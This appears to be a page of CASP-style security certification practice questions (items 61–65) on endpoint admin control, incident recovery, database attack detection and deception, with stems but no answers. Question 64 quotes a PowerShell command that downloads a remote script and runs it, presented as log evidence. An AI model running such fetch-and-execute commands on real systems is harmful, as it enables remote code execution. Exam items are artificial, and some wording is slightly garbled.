Question 61

A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.
Which of the following is the BEST solution to meet these objectives?
  • Question 62

    A financial institution has several that currently employ the following controls:
    * The severs follow a monthly patching cycle.
    * All changes must go through a change management process.
    * Developers and systems administrators must log into a jumpbox to access the servers hosting the data using two-factor authentication.
    * The servers are on an isolated VLAN and cannot be directly accessed from the internal production network.
    An outage recently occurred and lasted several days due to an upgrade that circumvented the approval process. Once the security team discovered an unauthorized patch was installed, they were able to resume operations within an hour. Which of the following should the security administrator recommend to reduce the time to resolution if a similar incident occurs in the future?
  • Question 63

    A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements:
    * Work at the application layer
    * Send alerts on attacks from both privileged and malicious users
    * Have a very low false positive
    Which of the following should the architect recommend?
  • Question 64

    A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have alerted and prevented the next phase of the attack?
  • Question 65

    A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information.
    Which of the following would be BEST for the company to implement?